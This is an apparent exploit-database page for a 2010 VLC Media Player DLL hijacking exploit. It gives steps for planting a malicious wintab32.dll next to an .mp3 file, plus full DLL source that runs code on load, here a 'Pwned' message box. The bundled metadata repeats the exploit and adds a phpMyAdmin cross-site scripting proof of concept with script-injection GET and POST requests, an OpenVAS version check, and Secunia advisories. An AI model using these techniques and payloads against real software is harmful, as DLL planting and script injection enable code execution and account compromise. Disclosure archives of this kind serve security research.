Search...

VLC Media Player DLL Hijacking Exploit

2010-08-25T00:00:00

ID 1337DAY-ID-13825
Type zdt
Reporter Secfence
Modified 2010-08-25T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ======================================
VLC Media Player DLL Hijacking Exploit
======================================

Exploit Title: VLC Player DLL Hijack Vulnerability
Date: 25 Aug 2010
Author: Secfence
Version: VLC
Tested on: Windows XP

Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in
vlc player.

Code for wintab32.dll:

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"
#include "dragon.h"

void init() {
MessageBox(NULL,"Pwned", "Pwned!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

/*----------*/




#  0day.today [2018-01-01]  #

JSON Vulners Source

Initial Source

{"published": "2010-08-25T00:00:00", "id": "1337DAY-ID-13825", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:46:05", "bulletin": {"published": "2010-08-25T00:00:00", "id": "1337DAY-ID-13825", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 9.0, "modified": "2016-04-20T01:46:05"}}, "hash": "3101f29a02f8ef6a19b0a0e07e59f3a2899a584a6bd5fb06c1244239c7f14434", "description": "Exploit for windows platform in category local exploits", "type": "zdt", "lastseen": "2016-04-20T01:46:05", "edition": 1, "title": "VLC Media Player DLL Hijacking Exploit", "href": "http://0day.today/exploit/description/13825", "modified": "2010-08-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/13825", "references": [], "reporter": "Secfence", "sourceData": "======================================\r\nVLC Media Player DLL Hijacking Exploit\r\n======================================\r\n\r\nExploit Title: VLC Player DLL Hijack Vulnerability\r\nDate: 25 Aug 2010\r\nAuthor: Secfence\r\nVersion: VLC\r\nTested on: Windows XP\r\n\r\nPlace a .mp3 file and wintab32.dll in same folder and execute .mp3 file in\r\nvlc player.\r\n\r\nCode for wintab32.dll:\r\n\r\n/*----------*/\r\n\r\n/* wintab32.cpp */\r\n\r\n#include \"stdafx.h\"\r\n#include \"dragon.h\"\r\n\r\nvoid init() {\r\nMessageBox(NULL,\"Pwned\", \"Pwned!\",0x00000003);\r\n}\r\n\r\n\r\nBOOL APIENTRY DllMain( HANDLE hModule,\r\n DWORD ul_reason_for_call,\r\n LPVOID lpReserved\r\n )\r\n{\r\n switch (ul_reason_for_call)\r\n{\r\ncase DLL_PROCESS_ATTACH:\r\n init();break;\r\ncase DLL_THREAD_ATTACH:\r\ncase DLL_THREAD_DETACH:\r\n case DLL_PROCESS_DETACH:\r\nbreak;\r\n }\r\n return TRUE;\r\n}\r\n\r\n/*----------*/\r\n\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "d27145ad106282662d2a80ed71d2c153", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "22398dd31ad535de00afacb2b4233bd5", "key": "sourceData"}, {"hash": "9db3028ca4bb5c0b3cbe6ad23789c74d", "key": "title"}, {"hash": "b99fcfac0895024e7e6090a65051a198", "key": "published"}, {"hash": "900131f1165c66908a5badfdf7ba24c1", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "b99fcfac0895024e7e6090a65051a198", "key": "modified"}, {"hash": "6e59c05b909b6fa17c502d462dfc74ba", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category local exploits", "hash": "b797fafe1ac930553d2289f9c1ddb831b860c3400e474daf99bd1cc98662d198", "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2018-01-01T13:06:01"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310105827"]}, {"type": "zdt", "idList": ["1337DAY-ID-11284"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7597"]}], "modified": "2018-01-01T13:06:01"}, "vulnersScore": 1.1}, "type": "zdt", "lastseen": "2018-01-01T13:06:01", "edition": 2, "title": "VLC Media Player DLL Hijacking Exploit", "href": "https://0day.today/exploit/description/13825", "modified": "2010-08-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/13825", "references": [], "reporter": "Secfence", "sourceData": "======================================\r\nVLC Media Player DLL Hijacking Exploit\r\n======================================\r\n\r\nExploit Title: VLC Player DLL Hijack Vulnerability\r\nDate: 25 Aug 2010\r\nAuthor: Secfence\r\nVersion: VLC\r\nTested on: Windows XP\r\n\r\nPlace a .mp3 file and wintab32.dll in same folder and execute .mp3 file in\r\nvlc player.\r\n\r\nCode for wintab32.dll:\r\n\r\n/*----------*/\r\n\r\n/* wintab32.cpp */\r\n\r\n#include \"stdafx.h\"\r\n#include \"dragon.h\"\r\n\r\nvoid init() {\r\nMessageBox(NULL,\"Pwned\", \"Pwned!\",0x00000003);\r\n}\r\n\r\n\r\nBOOL APIENTRY DllMain( HANDLE hModule,\r\n DWORD ul_reason_for_call,\r\n LPVOID lpReserved\r\n )\r\n{\r\n switch (ul_reason_for_call)\r\n{\r\ncase DLL_PROCESS_ATTACH:\r\n init();break;\r\ncase DLL_THREAD_ATTACH:\r\ncase DLL_THREAD_DETACH:\r\n case DLL_PROCESS_DETACH:\r\nbreak;\r\n }\r\n return TRUE;\r\n}\r\n\r\n/*----------*/\r\n\r\n\r\n\n\n# 0day.today [2018-01-01] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "4ac90bb5e250b8ae09d2d938ee90f340", "key": "href"}, {"hash": "b99fcfac0895024e7e6090a65051a198", "key": "modified"}, {"hash": "b99fcfac0895024e7e6090a65051a198", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6e59c05b909b6fa17c502d462dfc74ba", "key": "reporter"}, {"hash": "c13c40fb590d1186c056bc2ab64522e6", "key": "sourceData"}, {"hash": "0f5a829abd11e87be000a4ed5ef2049e", "key": "sourceHref"}, {"hash": "9db3028ca4bb5c0b3cbe6ad23789c74d", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"openvas": [{"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "scanner", "description": "Filr is prone to multiple vulnerabilities", "modified": "2019-02-22T00:00:00", "published": "2016-07-25T00:00:00", "id": "OPENVAS:1361412562310105827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105827", "title": "Multiple Vulnerabilities in Micro Focus (Novell) Filr", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_filr_mult_vulns_07_16.nasl 3758 2016-07-25 17:09:24Z mime $\n#\n# Multiple vulnerabilities in Micro Focus (Novell) Filr\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microfocus:filr\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105827\");\n script_cve_id(\"CVE-2016-1607\", \"CVE-2016-1608\", \"CVE-2016-1609\", \"CVE-2016-1610\", \"CVE-2016-1611\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_version(\"$Revision: 13825 $\");\n\n script_name(\"Multiple Vulnerabilities in Micro Focus (Novell) Filr\");\n\n script_xref(name:\"URL\", value:\"https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities where detected in filr:\n\n - Cross Site Request Forgery (CSRF) - CVE-2016-1607\n\n - OS Command Injection - CVE-2016-1608\n\n - Insecure System Design\n\n - Persistent Cross-Site Scripting - CVE-2016-1609\n\n - Missing Cookie Flags\n\n - Authentication Bypass - CVE-2016-1610\n\n - Path Traversal - CVE-2016-1610\n\n - Insecure File Permissions - CVE-2016-1611\n\nSee the referenced advisory for further information.\");\n\n script_tag(name:\"solution\", value:\"Update to Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871 or newer\");\n\n script_tag(name:\"summary\", value:\"Filr is prone to multiple vulnerabilities\");\n\n script_tag(name:\"affected\", value:\"Filr 2 <= 2.0.0.421, Filr 1.2 <= 1.2.0.846\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 07:38:47 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-25 16:47:46 +0200 (Mon, 25 Jul 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_filr_version.nasl\");\n script_mandatory_keys(\"filr/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\nif( version =~ \"^1\\.2\" )\n fix = '1.2.0.871';\n\nelse if( version =~ \"^2\\.0\" )\n fix = '2.0.0.465';\n\nelse\n exit( 99 );\n\nif( version_is_less( version:version, test_version:fix ) ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-10T11:04:49", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2010-03-13T00:00:00", "published": "2010-03-13T00:00:00", "id": "1337DAY-ID-11284", "href": "https://0day.today/exploit/description/11284", "type": "zdt", "title": "phpmyadmin 3.3.0 Cross Site Scripting Vulnerability", "sourceData": "===================================================\r\nphpmyadmin 3.3.0 Cross Site Scripting Vulnerability\r\n===================================================\r\n\r\nthere is a xss in phpmyadmin 3.3.0 when we create new database in interface, the \"new_db\" parameter do not filter characters when users enter. attacker can enter malicious code, like \"<script>alert(/liscker/);</script>\". it also can be true in post and get. but in post, we can not encode xss code, or , the xss will faild. \r\n \r\n \r\n \r\n \r\nFor example:\r\n \r\n \r\nGET:\r\n \r\nhttp://localhost/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251ab7ae3934&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=\r\n \r\n \r\nPOST:\r\n \r\nPOST /phpmyadmin/db_create.php HTTP/1.1\r\nAccept: */*\r\nReferer: http://localhost/phpmyadmin/db_create.php\r\nAccept-Language: zh-cn\r\nContent-Type: application/x-www-form-urlencoded\r\nUA-CPU: x86\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)\r\nHost: localhost\r\nContent-Length: 123\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: phpMyAdmin=95830e770d0f213c04d63b623940f46f95c6f571; pma_lang=en-utf-8; pma_charset=utf-8; pma_collation_connection=utf8_general_ci; pmaUser-1=Hfd255%2Bp2dc%3D; pma_navi_width=200; pmaPass-1=MlPzQC8J2iY%3D; pma_fontsize=82%25; pma_theme=original\r\ntoken=759f7a380111a292995ec447408bbdb3&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=\r\n \r\n \r\n \r\nWhen you test, please replace the session \"759f7a380111a292995ec447408bbdb3\" with yourself. I suggest to test it in interface.\r\n \r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11284"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nHardcore Disassembler / Reverse Engineer Wanted!\r\n\r\nWant to work with IDA and BinDiff?\r\nWant to write PoC's and Exploits?\r\n\r\nYour nationality is not important.\r\nWe will get you a work permit, find an apartment, and offer a\r\nrelocation compensation package.\r\n\r\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nComet WebFileManager "Language" File Inclusion Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA21432\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/21432/\r\n\r\nCRITICAL:\r\nHighly critical\r\n\r\nIMPACT:\r\nSystem access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nComet WebFileManger 0.x\r\nhttp://secunia.com/product/11284/\r\n\r\nDESCRIPTION:\r\nPhilipp Niedziela has discovered a vulnerability in Comet\r\nWebFileManager, which can be exploited by malicious people to\r\ncompromise a vulnerable system.\r\n\r\nInput passed to the "Language" parameter in CheckUpload.php is not\r\nproperly verified before being used to include files. This can be\r\nexploited to include arbitrary files from local or external\r\nresources.\r\n\r\nThe vulnerability has been confirmed in version 0.9.1. Other versions\r\nmay also be affected.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly verified.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nPhilipp Niedziela\r\n\r\nORIGINAL ADVISORY:\r\nhttp://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-08-09T00:00:00", "published": "2006-08-09T00:00:00", "id": "SECURITYVULNS:DOC:13825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13825", "title": "[SA21432] Comet WebFileManager "Language" File Inclusion Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nSquid Two Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA13825\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/13825/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nDoS, System access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nSquid 2.x\r\nhttp://secunia.com/product/310/\r\n\r\nDESCRIPTION:\r\nTwo vulnerabilities have been reported in Squid, which can be\r\nexploited by malicious people to cause a DoS (Denial of Service) or\r\npotentially compromise a vulnerable system.\r\n\r\n1) An error in the handling of invalid field values in\r\n"WCCP_I_SEE_YOU" messages can be exploited to crash Squid by sending\r\na specially crafted UDP datagram with a spoofed WCCP (Web Cache\r\nCommunication Protocol) router's IP address.\r\n\r\nSuccessful exploitation requires that WCCP is enabled (not default\r\nsetting).\r\n\r\n2) A boundary error in the "gopherToHTML()" function can be exploited\r\nvia a malicious gopher server to cause a buffer overflow by responding\r\nwith a specially crafted, overly long line.\r\n\r\nSuccessful exploitation may allow execution of arbitrary code.\r\n\r\nSOLUTION:\r\nApply patches for 2.5.STABLE7:\r\nhttp://www.squid-cache.org/Versions/v2/2.5/bugs/squid-2.5.STABLE7-gopher_html_parsing.patch\r\nhttp://www.squid-cache.org/Versions/v2/2.5/bugs/squid-2.5.STABLE7-wccp_denial_of_service.patch\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\n1)\r\nhttp://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE7-wccp_denial_of_service\r\n2)\r\nhttp://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE7-gopher_html_parsing\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-01-14T00:00:00", "published": "2005-01-14T00:00:00", "id": "SECURITYVULNS:DOC:7597", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7597", "title": "[SA13825] Squid Two Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}